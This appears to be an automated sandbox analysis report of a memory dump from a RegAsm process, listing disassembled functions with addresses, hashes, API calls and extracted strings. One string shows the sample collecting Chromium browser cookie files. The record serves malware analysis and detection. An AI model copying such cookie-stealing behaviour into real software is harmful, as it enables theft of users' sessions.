Opcode Fuzzy Hash: 21674e64e92a310214568b44b3c1c8fe80a47338733e208df0a675a2a57b3b92
Instruction Fuzzy Hash: 1C614DB140D380CFD310BFA5D61535FBAE0AB65308F058C2EE1C886242E77D8599DB67

Function 00420911 Relevance: 9.0, Strings: 7, Instructions: 298COMMON

Download Yara Rule

Strings

4D:F, xrefs: 0042093A
"@7B, xrefs: 00420942
pr, xrefs: 004209A2
2PlR, xrefs: 00420962
=K, xrefs: 00420AA6
VL, xrefs: 00420AAE
HC, xrefs: 00420AB6

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: pr$"@7B$2PlR$4D:F$=K$HC$VL
API String ID: 0-1209956768
Opcode ID: b149285f5b1d128e6d9bfac98948d55d945f3d298e473652fc24cf06a94d48a7
Instruction ID: eee8a322af8c533ba7fe5121947f4d37e7997e2f6d30026ecaa339f4c27a6d5f
Opcode Fuzzy Hash: b149285f5b1d128e6d9bfac98948d55d945f3d298e473652fc24cf06a94d48a7
Instruction Fuzzy Hash: B1C164B4608380DFE314DF19D890B1BBBF0BB85304F544A2DE1855B3A2C779D945CB9A

Function 0041EC8C Relevance: 7.9, Strings: 6, Instructions: 409COMMON

Download Yara Rule

Strings

LKJI, xrefs: 0041EF90
4`[b, xrefs: 0041F190
4`[b, xrefs: 0041F090
ZX, xrefs: 0041ED2C
LKJI, xrefs: 0041F056
VT, xrefs: 0041ED22

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: 4`[b$4`[b$LKJI$LKJI$VT$ZX
API String ID: 0-4063248853
Opcode ID: 587b844f183da2d3efe8f2726968ef05c0b4a6fe2374ee210497e3a7d6dccc78
Instruction ID: 7d6382e2e468169f9ebec05c3a6cdc3b04d43b33cec1063882b931f5b257a88d
Opcode Fuzzy Hash: 587b844f183da2d3efe8f2726968ef05c0b4a6fe2374ee210497e3a7d6dccc78
Instruction Fuzzy Hash: 8DE18DB4D05219CBDB24CF94D881AAEBBB5FF0A304F5085A9E509B7351C734AE81CF99

Function 0041BAC3 Relevance: 7.8, APIs: 1, Strings: 3, Instructions: 841COMMON

Download Yara Rule

Strings

LKJI, xrefs: 0041BB06
@M, xrefs: 0041BBE0
[info] collected cookies file of the chromium-based browser[info] collected cookies file of the chromium-based browser, xrefs: 0041BC57

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: @M$LKJI$[info] collected cookies file of the chromium-based browser[info] collected cookies file of the chromium-based browser
API String ID: 0-2544543437
Opcode ID: 83ef4b266fbb387e37ac430bd5ed7e60c6545c6ff8c0ec515cb5da381b77ba7e
Instruction ID: b6e18d7c4f59bbb42064016110aac06d1b60d5c13aa2d40ac5730c7d239c942f
Opcode Fuzzy Hash: 83ef4b266fbb387e37ac430bd5ed7e60c6545c6ff8c0ec515cb5da381b77ba7e
Instruction Fuzzy Hash: 1E52F075A0021ACFDB14CFA8DC907AEB7B2FF4A300F158569D951A7390D734AD91CBA8

Function 00411E0E Relevance: 6.8, Strings: 5, Instructions: 548COMMON

Download Yara Rule

Strings

4`[b, xrefs: 00412CB0
_^, xrefs: 00413123
eZ, xrefs: 00411EF6
\#A, xrefs: 004131FD
LKJI, xrefs: 00412C4E

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: 4`[b$LKJI$\#A$_^$eZ
API String ID: 0-41471561
Opcode ID: f141ee6b871b4b1453d5c49e2217bb93e0b71bdf6f2d05d6ed13e3222a2d7815
Instruction ID: f9d2840ec2a34d52c0e91939f84ae3b7a72a70ae19204765e0375469c95922f1
Opcode Fuzzy Hash: f141ee6b871b4b1453d5c49e2217bb93e0b71bdf6f2d05d6ed13e3222a2d7815
Instruction Fuzzy Hash: BC0257752083819BD724CF18C99076BBBF1EF86344F18482DE5C58B362E779D991CB4A

Function 004217C0 Relevance: 6.6, Strings: 5, Instructions: 400COMMON

Download Yara Rule

Strings

[-\/, xrefs: 00421928
S!A#, xrefs: 00421920
nTSR, xrefs: 004217EF
h%O', xrefs: 00421968
D)*+, xrefs: 00421930

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: D)*+$S!A#$[-\/$h%O'$nTSR
API String ID: 0-3335576809
Opcode ID: 40540692061baf9835aebdd72065d35985c76ba45d971ae0527633171b0f6011
Instruction ID: a4bbf9724d58bd21daa82a292fa1eb7c861827528966072661b8a9b2a160c8ba
Opcode Fuzzy Hash: 40540692061baf9835aebdd72065d35985c76ba45d971ae0527633171b0f6011
Instruction Fuzzy Hash: DDE186706083908BD328CF18D49076FBBE1EFC5348F50492DE5DAAB2A1D7749949CB9B

Function 00411E30 Relevance: 5.5, Strings: 4, Instructions: 529COMMON

Download Yara Rule

Strings

4`[b, xrefs: 00412CB0
_^, xrefs: 00413123
\#A, xrefs: 004131FD
LKJI, xrefs: 00412C4E

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: 4`[b$LKJI$\#A$_^
API String ID: 0-983708619
Opcode ID: 49fe0b19115c61819dca4f5bb6c85f0ea22a6c1e0a4b1d1334c90e2d594a24b6
Instruction ID: ff99545f81fa7cb89b6bfd9c5eb12d6468eed208e005a7b7a54397d041cfef8e
Opcode Fuzzy Hash: 49fe0b19115c61819dca4f5bb6c85f0ea22a6c1e0a4b1d1334c90e2d594a24b6
Instruction Fuzzy Hash: 5C0257742083419BD724CF18C590B6BBBF1EF86344F14492DE5C98B362E779D991CB4A

Function 00421E0D Relevance: 5.4, Strings: 4, Instructions: 381COMMON

Download Yara Rule

Strings

++#,, xrefs: 00421E25
""B, xrefs: 00422217
##+$, xrefs: 00421E35
4`[b, xrefs: 004222A0

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: ""B$##+$$++#,$4`[b
API String ID: 0-457130333
Opcode ID: cf3af0954d1deb321dc80a1f5be824449c4113343b81aa8377fd58c18d481228
Instruction ID: c8a3ca4bcc00f9b66f540227075e6a2b568aa06c1098a30901a043f4b0b44411
Opcode Fuzzy Hash: cf3af0954d1deb321dc80a1f5be824449c4113343b81aa8377fd58c18d481228
Instruction Fuzzy Hash: 6FD1CEB06083419FC314DF28D89166BFBE1EF8A344F54892EE599873A2D339D905CB5B

Function 00411D2E Relevance: 5.1, Strings: 4, Instructions: 147COMMON

Download Yara Rule

Strings

LKJI, xrefs: 00411C76
LKJI, xrefs: 00411D56
4`[b, xrefs: 00411CD0
4`[b, xrefs: 00411DB0

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: 4`[b$4`[b$LKJI$LKJI
API String ID: 0-90256393
Opcode ID: 925689405bb27654c3538762b1578bb991e661280b0bb5c46e7faba1314d93b7
Instruction ID: 3607f108ff118f525befa68ff287675469556c26076f157ebdb072f0463a0581
Opcode Fuzzy Hash: 925689405bb27654c3538762b1578bb991e661280b0bb5c46e7faba1314d93b7
Instruction Fuzzy Hash: 7B415B79209241CBD718DB14D4A066EF7E2FF8A341F5A8A2DE6C653360C734E951CB8A

Function 004121A8 Relevance: 4.2, Strings: 3, Instructions: 478COMMON

Download Yara Rule

Strings

4`[b, xrefs: 004126F0
r"A, xrefs: 004121EE
2%A, xrefs: 004124B2

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: 2%A$4`[b$r"A
API String ID: 0-196054106
Opcode ID: 28bc4ae58365d3e9a6f432cbda95c854a271ff4da516df5f5c2e1c166560f652
Instruction ID: d0ac5accb13781abd1ff310f2dab33f88cd26e2afea87e155b560ef59039b841
Opcode Fuzzy Hash: 28bc4ae58365d3e9a6f432cbda95c854a271ff4da516df5f5c2e1c166560f652
Instruction Fuzzy Hash: CDF1BCB4208341DBDB18CF14D8A072BBBF1FF8A348F05486CE58A9B291D779D955CB4A

Function 004127AA Relevance: 4.2, Strings: 3, Instructions: 459COMMON

Download Yara Rule

Strings

4`[b, xrefs: 004126F0
r"A, xrefs: 004121EE
2%A, xrefs: 004124B2

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: 2%A$4`[b$r"A
API String ID: 0-196054106
Opcode ID: 1e6ce3dedbb279affca6f80464d98676daa08cca21e60858d1dbe15fdc3dadf6
Instruction ID: 49d841b1c9cafd2c2c72db3a3b80caf0ae438b1a25738b29a63f6252ca8961df
Opcode Fuzzy Hash: 1e6ce3dedbb279affca6f80464d98676daa08cca21e60858d1dbe15fdc3dadf6
Instruction Fuzzy Hash: 80F19BB4208341DBDB18CF14D8A072BBBF1FF8A344F05486DE58A8B2A1D779D955CB4A

Function 0042EE34 Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 703memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 0042EFF5

Strings

0, xrefs: 0042F959

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocString
String ID: 0
API String ID: 2525500382-4108050209
Opcode ID: 6e609c694ecf2a373b9a509cef8259c9dd5ad1f968737f5f2d5de57da3bbad10
Instruction ID: fcb80ce1eb6220bb55ffd5f05174efb7586905aa5c9ec61a22d530df1a706dbf
Opcode Fuzzy Hash: 6e609c694ecf2a373b9a509cef8259c9dd5ad1f968737f5f2d5de57da3bbad10
Instruction Fuzzy Hash: E352D3F1C14780CAD7447F34AD5624A7EB0EB22309F86859DD89D2F246E238856E9B73

Function 0042FAD0 Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 701memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 0042FC99

Strings

0, xrefs: 004305FF

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocString
String ID: 0
API String ID: 2525500382-4108050209
Opcode ID: eef0632c87aeecfe7b785ca8e3dc201d239f3360b3c3160ff1cd79245b6c676f
Instruction ID: f33429cc79dad1ed2b470f8a5ba53a23ac4b9d47441d5cdc5505a0d39fd073e5
Opcode Fuzzy Hash: eef0632c87aeecfe7b785ca8e3dc201d239f3360b3c3160ff1cd79245b6c676f
Instruction Fuzzy Hash: EF52D3F1C187808AD7447F34AD5624A7EB0EB22309F86859DD89D2F246E238855E9B73

Function 00405880 Relevance: 4.2, Strings: 3, Instructions: 405COMMON

Download Yara Rule

Strings

), xrefs: 00405933
IEND, xrefs: 00405CFE
), xrefs: 0040593D

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: )$)$IEND
API String ID: 0-588110143
Opcode ID: 1d4a5ba78e4b4c5c90850788a776ef85473c9650f40f179f8c4c015e66da82f5
Instruction ID: 5e93faaa14417b071263fec42a7ad5911416fcb7f8ec669a35d6c83a2ff07581
Opcode Fuzzy Hash: 1d4a5ba78e4b4c5c90850788a776ef85473c9650f40f179f8c4c015e66da82f5
Instruction Fuzzy Hash: E0E1AEB1A08B019BE310DF29C88571BBBE0FB94314F144A3EE595A73D2D779E815CB86

Function 00406280 Relevance: 3.3, Strings: 2, Instructions: 810COMMON

Download Yara Rule

Strings

8, xrefs: 00406B88
0, xrefs: 00406B90

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: 70cfd6495652360cd7a9e97ebe82b008aa6677573e56a82d601d19320522952c
Instruction ID: e42365520dcc320f17623a16f884dc5c944c2b2fa63e88535184b1fb0144da98
Opcode Fuzzy Hash: 70cfd6495652360cd7a9e97ebe82b008aa6677573e56a82d601d19320522952c
Instruction Fuzzy Hash: 307268716083409FD714CF18C880B5FBBE1AF98314F15892EF98A9B392D379D958CB96

Function 0042CF2A Relevance: 3.3, APIs: 2, Instructions: 283COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0042CF34
VariantInit.OLEAUT32 ref: 0042CF47

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit
String ID:
API String ID: 2610073882-0
Opcode ID: 6cdac31d7b8acac1671b4ce8266b62f23104b9478e31b8dc49bc84e7396bc636
Instruction ID: 66ec4fe37a2529bbc7f318991ff2c22303fafdfc965e00b42bdbbd25a8307532
Opcode Fuzzy Hash: 6cdac31d7b8acac1671b4ce8266b62f23104b9478e31b8dc49bc84e7396bc636
Instruction Fuzzy Hash: FBC184B25197808BD318DF78D4663FEBAD49F65324F194A2EE2AA872C1DA7C4444CB13

Function 00430EA1 Relevance: 3.2, APIs: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00430EA7
VariantInit.OLEAUT32 ref: 00430EB6

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit
String ID:
API String ID: 2610073882-0
Opcode ID: c69a744e9953882132789c1d325d776a4b809c6f1ade6bf8c09a512fd2487bcb
Instruction ID: 37c6e51a9c6fbcceb78bdfc40cacbe86a2943ad6be26ed38e9ec0690fa15ca50
Opcode Fuzzy Hash: c69a744e9953882132789c1d325d776a4b809c6f1ade6bf8c09a512fd2487bcb
Instruction Fuzzy Hash: CBA140B1819B809BE301BF74E90930ABFF0EB5230AF45C96DD4D847742E2759568DBA3

Function 0042DC2A Relevance: 3.2, APIs: 2, Instructions: 203COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0042DC34
VariantInit.OLEAUT32 ref: 0042DC47

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit
String ID:
API String ID: 2610073882-0
Opcode ID: 922f75c8c1fed9bdf85cc8da4ff9143bd6c6510ced49ae175c6fa50065a29cfb
Instruction ID: 1bd7cd671c38dc34411f6e434c448475d46bbaec1132fbd7d26fc97804415525
Opcode Fuzzy Hash: 922f75c8c1fed9bdf85cc8da4ff9143bd6c6510ced49ae175c6fa50065a29cfb
Instruction Fuzzy Hash: F8A1B5B150D7C4CEE321AF6485453DBBBE0AFA2709F45881ED0D84B342C67A9589CB27

Function 0041B360 Relevance: 2.9, Strings: 2, Instructions: 447COMMON

Download Yara Rule

Strings

4`[b, xrefs: 0041B7E0
BA@G, xrefs: 0041B5CD

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: 4`[b$BA@G
API String ID: 0-1293177700
Opcode ID: 5bc0afd3908d6e9380b6f15f3fb4a8408c8915614c3d566821c1f692779a9707
Instruction ID: 88b65d37bbe492f47f49c7782aa27862b9761e8ab95eb03b7f9a051c6244bc72
Opcode Fuzzy Hash: 5bc0afd3908d6e9380b6f15f3fb4a8408c8915614c3d566821c1f692779a9707
Instruction Fuzzy Hash: A1C1AC715082009BC711EF18C891A6BB7F1EF96714F09492EE8C597392E339ED84CB9B

Function 0043E2BF Relevance: 2.9, Strings: 2, Instructions: 387COMMON

Download Yara Rule

Strings

C, xrefs: 0043E779, 0043E7A0
BC, xrefs: 0043E934

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: BC$C
API String ID: 0-3447698494
Opcode ID: 4063ed7a039e8db7718dc04bd5a8d773f438f0e9b03f0517939c65bb7d967677
Instruction ID: c0e45580fedfa90b696a31c38d182cadd118a78f7000f669756f74edee7096c1
Opcode Fuzzy Hash: 4063ed7a039e8db7718dc04bd5a8d773f438f0e9b03f0517939c65bb7d967677
Instruction Fuzzy Hash: 9EC1C07AE01226CFDB00CF98D8946AFB7B1FF8A325F1A45A9C85567391C330AD01CB94

Function 00410511 Relevance: 2.9, Strings: 2, Instructions: 356COMMON

Download Yara Rule

Strings

@, xrefs: 004106F8
(<, xrefs: 004106EE

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: (<$@
API String ID: 0-4001883151
Opcode ID: 84977db1d7939ad05a92eb74290c82e5f2e2035e5caa2226011dfdb68f3452bd
Instruction ID: 15933e1a805a3b0c4df29481ce881cfd16eb6c35077e1a4d3627489712e45802
Opcode Fuzzy Hash: 84977db1d7939ad05a92eb74290c82e5f2e2035e5caa2226011dfdb68f3452bd
Instruction Fuzzy Hash: 65C1697060C3808BD360EF28C895B9ABBE4EF96308F140D2DE5C997352D7799894CB5B

Function 00410AED Relevance: 1.8, Strings: 1, Instructions: 537COMMON

Download Yara Rule

Strings

LKJI, xrefs: 00410B49

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: LKJI
API String ID: 0-2313094147
Opcode ID: c66ddd0c124faff34cb277ba9c2a3de62dc26ea989feb625e08c042f4024de51
Instruction ID: 8459a547653bf5e9dacc52717d69efab5d393f7ce56f6c44bf262d956c15218e
Opcode Fuzzy Hash: c66ddd0c124faff34cb277ba9c2a3de62dc26ea989feb625e08c042f4024de51
Instruction Fuzzy Hash: 030208759083518FC720DF28D8816AAB3E1FF89314F050D2EF89597392E779AD85C78A

Function 00430654 Relevance: 1.8, APIs: 1, Instructions: 267COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 0043069C

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitVariant
String ID:
API String ID: 1927566239-0
Opcode ID: 1f731454175fcc69c86f24bc12cb12f7b8e51fc496f2cc4d67833188ccd67229
Instruction ID: 9b4b69afbc48e07e646ed615dc29336c3ab5329c3c53269a27deaa5f6ed6c88e
Opcode Fuzzy Hash: 1f731454175fcc69c86f24bc12cb12f7b8e51fc496f2cc4d67833188ccd67229
Instruction Fuzzy Hash: F5B132B18153808BD701BF749D4660ABFA0EB52B09F49886DD8884F31AE675C558DF73

Function 0041B100 Relevance: 1.7, APIs: 1, Instructions: 242comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00442538,00000000,00000001,00442528), ref: 0041B129

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 52e52452aaa7ca2a49bc5625f63642bebf9c9265d2d70e5d05cebb140ead080e
Instruction ID: 8fcae564e8e4279bdcf777a18d64f6a3d7884b562fe1c3d053bea363c9d28198
Opcode Fuzzy Hash: 52e52452aaa7ca2a49bc5625f63642bebf9c9265d2d70e5d05cebb140ead080e
Instruction Fuzzy Hash: BC51D0B0600204ABDB209F64CC9ABB733B4EF85358F144959F9858B391E379ED45C7AA

Function 0042C9C6 Relevance: 1.7, APIs: 1, Instructions: 221COMMON

Download Yara Rule

APIs

SysStringLen.OLEAUT32 ref: 0042C9D0

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: String
String ID:
API String ID: 2568140703-0
Opcode ID: 549895c7c24c0a8afec477e43d9357718fb4121bc6eb50776e81e34f4beba340
Instruction ID: ec25e3e4ee89348b8d8d74c1aa4979454bc6cc2546b866070481a687119c80fc
Opcode Fuzzy Hash: 549895c7c24c0a8afec477e43d9357718fb4121bc6eb50776e81e34f4beba340
Instruction Fuzzy Hash: 8981C57660C7908FD7249F28C4903EFBAE1AFD5324F5A892ED4DD8B381DA758841C746

Function 0042A451 Relevance: 1.6, APIs: 1, Instructions: 138COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 0042A45B

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitVariant
String ID:
API String ID: 1927566239-0
Opcode ID: 0e8c35405e4124fb10531965bd8496ff74902b21d7bd710306103df4b1227f51
Instruction ID: 892e0be7ceccabbe5b5612627ff12e6a32d5d41430e54c119c5729f62e9c48a3
Opcode Fuzzy Hash: 0e8c35405e4124fb10531965bd8496ff74902b21d7bd710306103df4b1227f51
Instruction Fuzzy Hash: 9761F6B100E7809ED351AFA4C55639FBAE4EFA9308F858C5EE0D857342D6B98584CF27

Function 00415A30 Relevance: 1.6, Strings: 1, Instructions: 385COMMON

Download Yara Rule

Strings

B^A, xrefs: 00415E3C

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: B^A
API String ID: 0-2847703392
Opcode ID: 5c2743fa54b99482d6473ff1f6087fc33ddeaa49fa7372f6609c6820f1be69d3
Instruction ID: b21eb17e42f9850941ea306c0e3de2a8248dcf46bd455f0440aabbd171ca94aa
Opcode Fuzzy Hash: 5c2743fa54b99482d6473ff1f6087fc33ddeaa49fa7372f6609c6820f1be69d3
Instruction Fuzzy Hash: 06A198B0508300CBD718DF14C8A16ABB7F1EFD6754F588A1DE4C64B391E339A941CB9A

Function 0042D911 Relevance: 1.6, APIs: 1, Instructions: 131COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 0042D91B

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitVariant
String ID:
API String ID: 1927566239-0
Opcode ID: 3f1d5b173d874a0b84bde74cc72f26d966bd5e2bad2f672e2c32a0e0cfb1cbab
Instruction ID: 9e6292a52103e7b50a4955cd7b03d0a355f48ed04af21ba15a17f03a6d5ea372
Opcode Fuzzy Hash: 3f1d5b173d874a0b84bde74cc72f26d966bd5e2bad2f672e2c32a0e0cfb1cbab
Instruction Fuzzy Hash: 8051E5B100E7809ED350AFA4C55639FFAE4AFA5308F858C5EE1D857342D6B98984CF27

Function 00431DE3 Relevance: 1.6, Strings: 1, Instructions: 354COMMON

Download Yara Rule

Strings

5.Hr, xrefs: 00431DE4

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: 5.Hr
API String ID: 0-1388931448
Opcode ID: 26c08ba519ddfa1a79f2e89568be82ad2731ece640c91a967797db13f23f44b9
Instruction ID: c48ac4f458cfc6085d36926e2140f8c03c08d66afddb79cc9b23f924d694ae79
Opcode Fuzzy Hash: 26c08ba519ddfa1a79f2e89568be82ad2731ece640c91a967797db13f23f44b9
Instruction Fuzzy Hash: AEE108B18253808AD3017F74E95E30A7EB0DB5230AF85896DD9C84B387E27B855C9B77

Function 004117E0 Relevance: 1.6, Strings: 1, Instructions: 304COMMON

Download Yara Rule

Strings

X, xrefs: 00411ACB

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: X
API String ID: 0-3081909835
Opcode ID: 8f14532998a93a868b3e7c93f3d58a250a961c00172c31a9f82d0af0daff4301
Instruction ID: b85adb8df1c4fcb3e566f19345d1ea5e38275b5cd7f5a962a5e70164cc9d0da5
Opcode Fuzzy Hash: 8f14532998a93a868b3e7c93f3d58a250a961c00172c31a9f82d0af0daff4301
Instruction Fuzzy Hash: 3AB1387460D3808FD320DB18D591B9BBBF5EFD6308F04482DE6C88B252D37999508B1B

Function 0041182A Relevance: 1.5, Strings: 1, Instructions: 293COMMON

Download Yara Rule

Strings

X, xrefs: 00411ACB

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: X
API String ID: 0-3081909835
Opcode ID: 2cf945c89e8eadb84dbbd46679943b670c7d583eca624b355217ef4797b143c2
Instruction ID: b04dc10fa99dfd0be1293bb0cc0100c317130dd0d58fb19262c201999c7420ff
Opcode Fuzzy Hash: 2cf945c89e8eadb84dbbd46679943b670c7d583eca624b355217ef4797b143c2
Instruction Fuzzy Hash: F1A1047861D3808FD320DB18D591B9BBBF1EFD6308F04482DE6C88B252D3B999558B1B

Function 00422AC2 Relevance: 1.5, Strings: 1, Instructions: 281COMMON

Download Yara Rule

Strings

4`[b, xrefs: 00422DC0

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: 4`[b
API String ID: 0-3962175265
Opcode ID: 9527e88795ed56ed9ae388b37d7cd3a5e095a7f7349963f240e0f9147451695c
Instruction ID: 50a04b44c4d65ef1cc403e77cbbbe1d9300ca5881ab425121eb7b9584219caee
Opcode Fuzzy Hash: 9527e88795ed56ed9ae388b37d7cd3a5e095a7f7349963f240e0f9147451695c
Instruction Fuzzy Hash: 89A1CC7560C310DFD3148F28E95062FBBE2AB8A314F558A2EE8D653391C735AC45CB8A

Function 00407620 Relevance: 1.5, Strings: 1, Instructions: 265COMMON

